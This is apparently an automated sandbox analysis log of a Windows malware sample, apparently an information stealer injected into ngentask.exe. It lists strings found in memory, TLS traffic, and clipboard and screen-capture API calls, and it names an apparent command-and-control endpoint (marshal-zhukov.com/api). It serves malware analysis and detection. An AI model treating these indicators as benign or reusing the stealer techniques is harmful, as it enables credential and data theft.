    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstati
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/im
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=id
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547815675.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
    Source: ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
    Source: ceFgl3jkkk.exe, 00000002.00000003.1505557465.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505286993.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505789755.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546530228.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505890825.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547030217.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1505501911.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546492928.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
    Source: ngentask.exe, 00000003.00000002.1613155400.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/api)
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marshal-zhukov.com/apis
    Source: python39.dll.0.drString found in binary or memory: https://python.org/dev/peps/pep-0263/
    Source: ngentask.exe, 00000003.00000002.1613429184.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: ceFgl3jkkk.exe, 00000002.00000002.1548717939.0000000003430000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mandiant.com/resources/blog/tracking-malware-import-hashing
    Source: ceFgl3jkkk.exe, 00000002.00000003.1523747536.0000000003311000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523600484.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548099724.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1523686303.00000000032F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ntcore.com/files/richsign.htm
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
    Source: ceFgl3jkkk.exe, 00000000.00000003.1503202450.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1548042408.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
    Source: ceFgl3jkkk.exe, 00000002.00000003.1506886633.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1506725417.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000002.1547469415.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49765 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49776 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004348D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004348D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004348D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004348D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00435785 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00435785
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F5D1B30_2_00F5D1B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F592A00_2_00F592A0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F58A400_2_00F58A40
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F5D3E50_2_00F5D3E5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6BBE80_2_00F6BBE8
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F56C000_2_00F56C00
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6FD6C0_2_00F6FD6C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F576B40_2_00F576B4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F7169D0_2_00F7169D
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6FE8C0_2_00F6FE8C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6B7500_2_00F6B750
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F5D1B32_2_00F5D1B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F592A02_2_00F592A0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F58A402_2_00F58A40
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F5D3E52_2_00F5D3E5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F6BBE82_2_00F6BBE8
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F56C002_2_00F56C00
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F6FD6C2_2_00F6FD6C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F576B42_2_00F576B4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F7169D2_2_00F7169D
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F6FE8C2_2_00F6FE8C
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F6B7502_2_00F6B750
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004112103_2_00411210
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040D3303_2_0040D330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040F8823_2_0040F882
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00439E033_2_00439E03
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042F04C3_2_0042F04C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004010003_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004240E03_2_004240E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004390903_2_00439090
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042A14F3_2_0042A14F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040C1503_2_0040C150
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0043E1003_2_0043E100
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040F1A03_2_0040F1A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040B1B03_2_0040B1B0
